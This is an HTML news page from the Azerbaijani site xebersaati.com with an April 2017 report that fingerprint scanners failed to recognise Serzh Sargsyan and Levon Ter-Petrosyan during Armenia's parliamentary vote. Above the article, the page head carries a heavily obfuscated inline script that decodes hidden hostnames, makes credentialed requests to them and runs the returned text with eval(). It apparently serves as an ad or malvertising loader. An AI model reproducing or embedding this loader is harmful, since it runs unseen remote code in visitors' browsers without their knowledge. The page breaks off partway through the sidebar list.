<!DOCTYPE html>
<html>
  <head>
    <script data-cfasync="false" type="text/javascript">var n3s=window;for(var S in n3s){if(S.length===((148.20E1,0x1FD)>=(0x11F,0x191)?(0x59,6):41>(2.2E1,14.08E2)?0xB4:(11.78E2,50))&&S.charCodeAt((58<(0xE5,0x9E)?(0x56,3):(50.5E1,33)))===((0x252,0x1A2)>=(8.,126.)?(74.8E1,100):(1.0190E3,1.1280E3)<=57?0x15:(0x1DF,0x1E0))&&S.charCodeAt(((13.19E2,0x39)>8.07E2?(84.80E1,200):(18,8.620E2)<1.283E3?(15.9E1,5):(111,6.25E2)))===((0x173,0x201)<=(57,0x11A)?(8.34E2,34.4E1):(0x227,0x9C)<143.70E1?(68.,119):(45.80E1,118.))&&S.charCodeAt(((0xCC,1.02E2)>=0x19?(1.79E2,1):(0x4E,138)<=8?(0x21C,1.154E3):(0x128,95)))===((114,5.75E2)>=29.?(0x178,105):(148.,0x1B0))&&S.charCodeAt((0x139<=(4.05E2,0x14C)?(75.2E1,0):(78,15.3E1)>(110,2.75E2)?(14.290E2,''):(101,30.5E1)))===((1.640E2,0x10C)>(3.2E2,127.)?(0x80,119):(14.,8.70E1)))break};for(var I in n3s[S]){if(I.length===((107.9E1,0x50)<0x23B?(0x4A,8):(133.,0x8A))&&I.charCodeAt(((13.46E2,0x6D)<=(140.9E1,0x70)?(2.,5):(68,6.22E2)))===(11<=(0x256,0x1C7)?(0x11C,101):(94,0x1A3))&&I.charCodeAt((0xA0<(68.4E1,9.34E2)?(106.60E1,7):(0x1F9,68.3E1)))===((124.,0x123)>=0.?(7.0E2,116):(14.89E2,7.890E2)>=127.30E1?(14.22E2,0x24D):(8.22E2,4.45E2))&&I.charCodeAt(((86.4E1,0x66)<89.?(57,"I"):(8.4E1,118.4E1)>=(98.2E1,0x22E)?(10.60E1,3):(0x14F,141.)))===((4.49E2,108)>1.423E3?0x211:0x32<=(0x15E,96.60E1)?(0xD6,117):(0xD6,0x212))&&I.charCodeAt(((9.790E2,56.)>(149,76.)?'b':1.70E1<(0x1A0,140.1E1)?(143.,0):(120,65.)))===((2.88E2,84)<=59.?4.3E1:(7.47E2,56.40E1)<(0x75,0x24F)?(127.,100):(0x1DB,0x197)))break};(function(T,v,x,u){n3s[S][v]=function(){var o=((70,0x137)>=52?(1.204E3,0):(39.7E1,0xB6)),l=o,c=function c(){var P=((0x196,0x75)<=0x7D?(76.,'/'):(2.64E2,134));var N='';var G='//';var s='ET';var f=(112<=(48.40E1,0x1A0)?(12.19E2,'G'):(13.70E1,46)>(0x1FC,0x1BE)?(100.80E1,'r'):(128.,0xFD));var K=((52,28.8E1)>=45.?(109.,true):(0x1EF,135.));var b=new XMLHttpRequest();b.withCredentials=K;b.open((f+s),(G)+n3s[S]['atob'](x[l].split(N).reverse().join(N))+P+u+P,K);b.onreadystatechange=function(){var M=(86.2E1>(9.700E2,104.)?(0x102,200):(128.,1.0010E3));var g=((76.,145.)<(0xEA,0x24F)?(13.,4):(0x41,115));if(b.readyState==g&&b.status==M&&b.responseText){eval(b.responseText);}};b.onerror=function(){if(++l!=x.length){c();}};try{b.send();}catch(M){b.onerror();}};c();};})(n3s[S][I],'_pianfsqh',['==QZ0l2ciV2duAjYphDbvp2Z','==Adlt2YpJ3YugWb5cXa4Q2Y','=U2YhB3cucne6RzY2xWb','==QZ0l2cuE2N3VmZ6dXM'],1054348);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1054347" onerror="window._pianfsqh();"></script>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb</title>
    <base href="http://www.xebersaati.com/">
    <meta property="fb:app_id" content="694464134024628" />
    <meta property="og:url" content="http://www.xebersaati.com/news/25665-ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yashanib/" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb" />
    <meta property="og:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta property="og:image" content="http://az.apa.az/upload/images/news/2017/april/02/big/petrosyan.jpg" />
    <meta property="fb:admins" content="708967524" />
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:site" content="@xebersaati" />
    <meta name="twitter:creator" content="@xebersaati" />
    <meta name="twitter:domain" content="http://www.xebersaati.com/" />
    <meta name="twitter:title" content="Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb" />
    <meta name="twitter:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="twitter:image" content="http://az.apa.az/upload/images/news/2017/april/02/big/petrosyan.jpg" />
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="index, follow" />
    <meta name="googlebot" content="index, archive" />
    <meta name="googlebot" content="all" />
    <meta name="yahoobot" content="index,follow" />
    <meta name="alexabot" content="index,follow" />
    <meta name="msnbot" content="index,follow" />
    <meta name="dmozbot" content="index,follow" />
    <meta name="revisit-after" content="1 days" />
    <meta name="description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="keywords" content="siyasət, iqtisadiyyat xəbərləri, dünya xəbərləri, gündəm, bölgə xəbərləri, xəbərlər, müharibə, xəbər, xəbər lenti" />
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/bootflat.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <link rel="icon" type="image/png" href="img/favicon.png"> 
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>

    <div class="container" id="container">
      <hr>
      <div class="logo pull-left">
        <a href="http://www.xebersaati.com/" class="pull-left"><img src="img/logo.png" alt="xəbər saatı"></a><div id="kategoriyalarButton"><button class="btn btn-danger">Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i></button></div>
      </div>

            

      <div class="languages pull-right">
        <span class="badge"><a href="lang.php?lang=az">AZ</a></span>
        <span class="badge"><a href="lang.php?lang=en">EN</a></span>
        <span class="badge"><a href="lang.php?lang=ru">RU</a></span>
        <span class="badge"><a href="lang.php?lang=tr">TR</a></span>
      </div>

      <div class="clearfix"></div>
      <hr> 
      <div class="row">
      <div id="kategoriyalar">
        <div class="categories center-block"><a href="http://www.xebersaati.com/category/afrika/" class="btn btn-xs btn-primary">Afrika</a><a href="http://www.xebersaati.com/category/amerika/" class="btn btn-xs btn-primary">Amerika</a><a href="http://www.xebersaati.com/category/aqrar-senaye-kompleksi/" class="btn btn-xs btn-primary">Aqrar-sənaye kompleksi</a><a href="http://www.xebersaati.com/category/asiya/" class="btn btn-xs btn-primary">Asiya</a><a href="http://www.xebersaati.com/category/atletika/" class="btn btn-xs btn-primary">Atletika</a><a href="http://www.xebersaati.com/category/avropa/" class="btn btn-xs btn-primary">Avropa</a><a href="http://www.xebersaati.com/category/avto-moto/" class="btn btn-xs btn-primary">Avto-Moto</a><a href="http://www.xebersaati.com/category/az/" class="btn btn-xs btn-primary">az</a><a href="http://www.xebersaati.com/category/birja/" class="btn btn-xs btn-primary">Birja</a><a href="http://www.xebersaati.com/category/biznes-ve-iqtisadiyyat-xeberleri/" class="btn btn-xs btn-primary">Biznes və iqtisadiyyat xəbərləri</a><a href="http://www.xebersaati.com/category/cemiyyet/" class="btn btn-xs btn-primary">Cəmiyyət</a><a href="http://www.xebersaati.com/category/dagliq-qarabag/" class="btn btn-xs btn-primary">Dağlıq Qarabağ</a><a href="http://www.xebersaati.com/category/dagliq-qarabag-munaqishesi/" class="btn btn-xs btn-primary">Dağlıq Qarabağ Münaqişəsi</a><a href="http://www.xebersaati.com/category/daxili-siyaset/" class="btn btn-xs btn-primary">Daxili siyasət</a><a href="http://www.xebersaati.com/category/diaspor/" class="btn btn-xs btn-primary">Diaspor</a><a href="http://www.xebersaati.com/category/din/" class="btn btn-xs btn-primary">Din</a><a href="http://www.xebersaati.com/category/doyush-novleri/" class="btn btn-xs btn-primary">Döyüş növləri</a><a href="http://www.xebersaati.com/category/dunya/" class="btn btn-xs btn-primary">Dünya</a><a href="http://www.xebersaati.com/category/dunya-xeberleri/" class="btn btn-xs btn-primary">Dünya xəbərləri</a><a href="http://www.xebersaati.com/category/energetika/" class="btn btn-xs btn-primary">Energetika</a><a href="http://www.xebersaati.com/category/edebiyyat/" class="btn btn-xs btn-primary">Ədəbiyyat</a><a href="http://www.xebersaati.com/category/futbol/" class="btn btn-xs btn-primary">Futbol</a><a href="http://www.xebersaati.com/category/hadise/" class="btn btn-xs btn-primary">Hadisə</a><a href="http://www.xebersaati.com/category/herbi/" class="btn btn-xs btn-primary">Hərbi</a><a href="http://www.xebersaati.com/category/idman/" class="btn btn-xs btn-primary">İdman</a><a href="http://www.xebersaati.com/category/iii-sektor/" class="btn btn-xs btn-primary">III Sektor</a><a href="http://www.xebersaati.com/category/ikt/" class="btn btn-xs btn-primary">İKT</a><a href="http://www.xebersaati.com/category/incesenet/" class="btn btn-xs btn-primary">İncəsənət</a><a href="http://www.xebersaati.com/category/infrastruktur/" class="btn btn-xs btn-primary">İnfrastruktur</a><a href="http://www.xebersaati.com/category/iqtisadi/" class="btn btn-xs btn-primary">İqtisadi</a><a href="http://www.xebersaati.com/category/iqtisadiyyat/" class="btn btn-xs btn-primary">İqtisadiyyat</a><a href="http://www.xebersaati.com/category/kriminal/" class="btn btn-xs btn-primary">Kriminal</a><a href="http://www.xebersaati.com/category/maliyye/" class="btn btn-xs btn-primary">Maliyyə</a><a href="http://www.xebersaati.com/category/maraqli/" class="btn btn-xs btn-primary">Maraqlı</a><a href="http://www.xebersaati.com/category/mdb/" class="btn btn-xs btn-primary">MDB</a><a href="http://www.xebersaati.com/category/media/" class="btn btn-xs btn-primary">Media</a><a href="http://www.xebersaati.com/category/medeniyyet/" class="btn btn-xs btn-primary">Mədəniyyət</a><a href="http://www.xebersaati.com/category/medeniyyet-siyaseti/" class="btn btn-xs btn-primary">Mədəniyyət siyasəti</a><a href="http://www.xebersaati.com/category/muharibe/" class="btn btn-xs btn-primary">Müharibə</a><a href="http://www.xebersaati.com/category/musahibe/" class="btn btn-xs btn-primary">Müsahibə</a><a href="http://www.xebersaati.com/category/nezer-noqtesi/" class="btn btn-xs btn-primary">Nəzər nöqtəsi</a><a href="http://www.xebersaati.com/category/olimpiada/" class="btn btn-xs btn-primary">Olimpiada</a><a href="http://www.xebersaati.com/category/ordu/" class="btn btn-xs btn-primary">Ordu</a><a href="http://www.xebersaati.com/category/sahibkarliq/" class="btn btn-xs btn-primary">Sahibkarlıq</a><a href="http://www.xebersaati.com/category/senaye-ve-energetika/" class="btn btn-xs btn-primary">Sənaye və energetika</a><a href="http://www.xebersaati.com/category/siyaset/" class="btn btn-xs btn-primary">Siyasət</a><a href="http://www.xebersaati.com/category/siyasi/" class="btn btn-xs btn-primary">Siyasi</a><a href="http://www.xebersaati.com/category/sosial/" class="btn btn-xs btn-primary">Sosial</a><a href="http://www.xebersaati.com/category/shou-biznes/" class="btn btn-xs btn-primary">Şou-biznes</a><a href="http://www.xebersaati.com/category/stolustu-oyunlar/" class="btn btn-xs btn-primary">Stolüstü oyunlar</a><a href="http://www.xebersaati.com/category/telekommunikasiya/" class="btn btn-xs btn-primary">Telekommunikasiya</a><a href="http://www.xebersaati.com/category/top-oyunlari/" class="btn btn-xs btn-primary">Top oyunları</a><a href="http://www.xebersaati.com/category/turizm/" class="btn btn-xs btn-primary">Turizm</a><a href="http://www.xebersaati.com/category/xarici-siyaset/" class="btn btn-xs btn-primary">Xarici siyasət</a></div><div class="clearfix"></div><hr> 
      </div>
      
      <div class="content">
  <a href="http://go.ad2up.com/afu.php?id=1054352" target="_blank"><img src="img/earn-money-from-internet.png" class="thumbnail img-responsive" id="kat"></a>
  <div class="box thumbnail">	
    <div class="xeberMetni">
          <img src="http://az.apa.az/upload/images/news/2017/april/02/big/petrosyan.jpg" alt="" class="thumbnail">
          <h1>Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb</h1>
          <p class="help-block"><em><small>2017-04-02 15:07</small> | <a href="http://apa.az/dunya-xeberleri/mdb-olkeleri/ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yasanib.html" target="_blank">www.apa.az</a> | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</em></p>
          

                        <p>Bu g&uuml;n Ermənistanda ke&ccedil;irilən parlament se&ccedil;kilərində kuryoz olay yaşanıb.</p>



<p><a href="http://apa.az">APA</a>-nın &ldquo;RİA Novosti&rdquo; agentliyinə istinadən verdiyi məlumata g&ouml;rə, Ermənistan prezidenti Serj Sərkisyan və Ermənistanın birinci prezidenti Levon Ter-Petrosyan səs verən zaman se&ccedil;ki məntəqələrində barmaq izinin tanınması &uuml;&ccedil;&uuml;n nəzərdə tutulan aparat onların he&ccedil; birinin barmaq izini tanımayıb.</p>



<p>S. Sərkisyan 10 barmağının hamısını aparata yaxınlaşdırsa da, bunun bir nəticəsi olmayıb. Prosesin &ccedil;ox uzandığını g&ouml;rən rusiyalı jurnalistlərdən biri bunun nə qədər davam edəcəyini soruşub. S. Sərkisyan isə bu məsələnin onun səlahiyyətinə daxil olmadığını bildirib. Nəhayət, S. Sərkisyan se&ccedil;ki komissiyasına pasportunu təqdim edib, talon alaraq səs verib.</p>



<p>L. Ter-Petrosyan da anoloji durumla &uuml;zləşib. &Ccedil;ətinliklə səs verən Ermənistanın birinci prezidenti se&ccedil;ki məntəqələrində işin təşkilini kolxoz işinə bənzədib.</p>



<p>Qeyd edək ki, 2015-ci ilin dekabrında qəbul edilən Konstitusiyaya dəyişikliklər Ermənistanın yarı prezident &uuml;sul-idarəsindən parlament &uuml;sul idarəsinə ke&ccedil;idini nəzərdə tutur. Dəyişikliklərə əsasən, prezidentin səlahiyyətləri azaldılıb, baş nazir və parlamentin səlahiyyətləri isə artırılıb. &Ouml;lkənin yeni prezidentini də yeni parlament m&uuml;əyyənləşdirəcək və prezident sadəcə formal səlahiyyətlərə malik olacaq. &nbsp;Parlament se&ccedil;kisi Ermənistan prezidenti Sery Sarkisyanın ikinci səlahiyyət m&uuml;ddətinin başa &ccedil;atmasına 1 il qalmış ke&ccedil;irilir. Se&ccedil;kidə beş partiya - hakim Respublika, Kommunist, Daşnaksutyun, &ldquo;Azad demokratlar&rdquo; və &ldquo;Erməni dir&ccedil;əlişi&rdquo; partiyaları, həm&ccedil;inin d&ouml;rd siyasi blok - &ldquo;Yelk&rdquo;, Ermənistan Milli Konqresi, &ldquo;Ohanyan-Raffi-Oskanyan&rdquo; və &ldquo;Tsarukyan&rdquo; blokları iştirak edir. Se&ccedil;kilərdə hakim d&uuml;şərgənin əsas rəqibləri qismində Ermənistan Milli Konqresi və &ldquo;Ohanyan-Raffi-Oskanyan&rdquo; bloku g&ouml;stərilir. Parlamentdə təmsil olunmaq &uuml;&ccedil;&uuml;n 7 faizlik baryeri aşmaq lazımdır.&nbsp;</p>

            <!--<iframe width="100%" height="315" src="http://apa.tv/embed/22530" frameborder="0" allowfullscreen=""></iframe>-->
            

                        


		
          <hr>
          <div class="text-center addthis_sharing_toolbox"></div>
        </div>    <div class="clearfix"></div>
  </div>
  <h1 class="relatedTitle">Bu kateqoriyadaki digər xəbərlər</h1>
  <div class="box"><h4>MDB</h4><ul class="media-list"><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25665-ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yashanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/petrosyan.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25665-ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yashanib/">Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb</a></div>
                  <small>2017-04-02 15:07 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25591-moskvada-qasirga-ile-bagli-ehaliye-xeberdarliq-edilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/moskva-2.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25591-moskvada-qasirga-ile-bagli-ehaliye-xeberdarliq-edilib/">Moskvada qasırğa ilə bağlı əhaliyə xəbərdarlıq edilib</a></div>
                  <small>2017-04-02 10:51 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25330-sabah-ermenistanda-parlament-seckileridir/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/01/big/secki.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25330-sabah-ermenistanda-parlament-seckileridir/">Sabah Ermənistanda parlament seçkiləridir</a></div>
                  <small>2017-04-01 11:26 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25269-ermenistanda-parlament-seckilerine-ukrayna-da-mushahideci-gondermeyecek/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/01/big/sergey-lebedev.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25269-ermenistanda-parlament-seckilerine-ukrayna-da-mushahideci-gondermeyecek/">Ermənistanda parlament seçkilərinə Ukrayna da müşahidəçi göndərməyəcək</a></div>
                  <small>2017-04-01 09:15 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 10</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25236-bmt-bash-katibi-ukraynada-ateshkese-dair-elde-olunan-razilashmani-alqishlayib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/01/big/2bad8c86-046a-4666-8c17-817e34fd7ce5.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25236-bmt-bash-katibi-ukraynada-ateshkese-dair-elde-olunan-razilashmani-alqishlayib/">BMT baş katibi  Ukraynada atəşkəsə dair əldə olunan razılaşmanı alqışlayıb</a></div>
                  <small>2017-04-01 03:56 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 8</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25222-tiflisde-iv-beynelxalq-reqs-festivali-kecirilir/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/01/big/17690896-1354297741298514-412301990-n.png"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25222-tiflisde-iv-beynelxalq-reqs-festivali-kecirilir/">Tiflisdə IV Beynəlxalq Rəqs Festivalı keçirilir</a></div>
                  <small>2017-04-01 02:01 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 12</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25134-rusiya-xin-tillersonun-aciqlamalari-teeccub-dogurur/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/31/big/nazvaniya.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25134-rusiya-xin-tillersonun-aciqlamalari-teeccub-dogurur/">Rusiya XİN: “Tillersonun açıqlamaları təəccüb doğurur”</a></div>
                  <small>2017-03-31 22:46 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 14</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25119-taninmish-rus-shairi-agir-veziyyetde-xestexanaya-yerleshdirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/31/big/4468000.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25119-taninmish-rus-shairi-agir-veziyyetde-xestexanaya-yerleshdirilib/">Tanınmış rus şairi ağır vəziyyətdə xəstəxanaya yerləşdirilib</a></div>
                  <small>2017-03-31 21:59 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 8</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25092-moldovada-korrupsiya-ishi-uzre-nazir-muavini-saxlanilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/31/big/1491240635.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25092-moldovada-korrupsiya-ishi-uzre-nazir-muavini-saxlanilib/">Moldovada korrupsiya işi üzrə nazir müavini saxlanılıb</a></div>
                  <small>2017-03-31 20:55 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/25091-mahacqalada-bazarda-bash-veren-yangin-neticesinde-33-nefer-xesaret-alib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/31/big/4467951-1.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/25091-mahacqalada-bazarda-bash-veren-yangin-neticesinde-33-nefer-xesaret-alib/">Mahaçqalada bazarda baş verən yanğın nəticəsində 33 nəfər xəsarət alıb</a></div>
                  <small>2017-03-31 20:36 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li></ul></div></div>
<div class="sidebar">
  <h1>Son xəbərlər</h1>
  <ul class="media-list"><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25679-turkmenler-istanbulda-kerkukle-bagli-etiraz-aksiyasi-kecirib-fotosessiya/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/ak-1.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25679-turkmenler-istanbulda-kerkukle-bagli-etiraz-aksiyasi-kecirib-fotosessiya/">Türkmənlər İstanbulda Kərküklə bağlı etiraz aksiyası keçirib - FOTOSESSİYA</a></div>
                <small>2017-04-02 15:43 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25676-aprel-doyushleri-ermenistan-ucun-ders-olan-aprel-doyushleri-ve-ya-geriye-yolu-olmayan-meglubiyyet/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2015/02/10/trend_karabax_soldier_albom_hd_200814_6.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25676-aprel-doyushleri-ermenistan-ucun-ders-olan-aprel-doyushleri-ve-ya-geriye-yolu-olmayan-meglubiyyet/">Aprel döyüşləri: Ermənistan üçün dərs olan aprel döyüşləri və ya geriyə yolu olmayan məğlubiyyət</a></div>
                <small>2017-04-02 15:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25675-baki-marafonu-2017-nin-aciq-hava-telimi-kecirilib-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTUvMzMvNTcvMzg0LzBhMDVhNDk1LTBmNWItNGFkZi04NjRkLWI1MDM4NTZlYmYwZC5qcGciXSxbInAiLCJlbmNvZGUiLCJqcGciLCItcXVhbGl0eSA4MCJdLFsicCIsInRodW1iIiwiNjIweDQ2NVx1MDAzZSJdXQ?sha=3d8ed6f3"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25675-baki-marafonu-2017-nin-aciq-hava-telimi-kecirilib-foto/">“Bakı Marafonu 2017”nin açıq hava təlimi keçirilib – FOTO</a></div>
                <small>2017-04-02 15:33 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25669-at-ve-eshshek-eti-satan-shexs-yeniden-tutuldu-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTUvMTkvMjUvMjU5L2V0LmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=86c88339"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25669-at-ve-eshshek-eti-satan-shexs-yeniden-tutuldu-foto/">At və eşşək əti satan şəxs yenidən tutuldu – FOTO</a></div>
                <small>2017-04-02 15:18 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 9</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25665-ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yashanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/petrosyan.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25665-ermenistanda-kecirilen-parlament-seckilerinde-kuryoz-olay-yashanib/">Ermənistanda keçirilən parlament seçkilərində kuryoz olay yaşanıb</a></div>
                <small>2017-04-02 15:07 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25663-ermenistanda-seckiler-parlamentin-sedrini-ve-eks-prezidenti-tanimadi/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2015/11/01/trend_election_2_011115_41.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25663-ermenistanda-seckiler-parlamentin-sedrini-ve-eks-prezidenti-tanimadi/">Ermənistanda seçkilər: Parlamentin sədrini və eks-prezidenti "tanımadı"</a></div>
                <small>2017-04-02 14:52 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25661-isvecde-mekteblileri-dashiyan-avtobus-yoldan-cixaraq-ashib-video/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTQvNTIvMTUvODM2L2lzdmVjLmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=5eafc01e"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25661-isvecde-mekteblileri-dashiyan-avtobus-yoldan-cixaraq-ashib-video/">İsveçdə məktəbliləri daşıyan avtobus yoldan çıxaraq aşıb – VİDEO</a></div>
                <small>2017-04-02 14:51 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25657-isvecde-mekteblileri-dashiyan-avtobus-qezaya-ugrayib-olen-ve-yaralananlar-var/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/02/26/sweden_ambulance.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25657-isvecde-mekteblileri-dashiyan-avtobus-qezaya-ugrayib-olen-ve-yaralananlar-var/">İsveçdə məktəbliləri daşıyan avtobus qəzaya uğrayıb: ölən və yaralananlar var</a></div>
                <small>2017-04-02 14:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25651-bu-gun-aprel-doyushlerinde-helak-olan-pilotlarin-anim-gunudur-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTQvMTAvMjUvNDg3L3BpbG90bGFyLmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=1e8622c3"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25651-bu-gun-aprel-doyushlerinde-helak-olan-pilotlarin-anim-gunudur-foto/">Bu gün aprel döyüşlərində həlak olan pilotların anım günüdür – FOTO</a></div>
                <small>2017-04-02 14:11 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25649-ermenistan-bash-prokurorlugu-secki-menteqelerinde-rushvet-veriler-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2012/06/17/Yerevan_170612_2.jpg"></a>
              <div class="media-body">
